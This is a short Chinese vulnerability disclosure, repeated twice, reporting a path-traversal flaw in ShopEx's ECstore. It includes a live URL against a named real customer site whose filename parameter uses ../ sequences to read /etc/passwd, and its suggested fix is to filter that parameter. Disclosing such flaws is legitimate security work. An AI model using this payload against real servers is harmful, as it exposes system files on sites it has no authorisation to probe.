ShopE旗下产品ECstore任意文件遍历漏洞
官方主站:http://ecstore.shopex.cn/在官方宣传上有成功案例:
http://mall.brands.com.tw/ec
http://mall.brands.com.tw/ec/index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd
修复方案:
对filename进行过滤
ShopE旗下产品ECstore任意文件遍历漏洞
官方主站:http://ecstore.shopex.cn/在官方宣传上有成功案例:
http://mall.brands.com.tw/ec
http://mall.brands.com.tw/ec/index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd
对filename进行过滤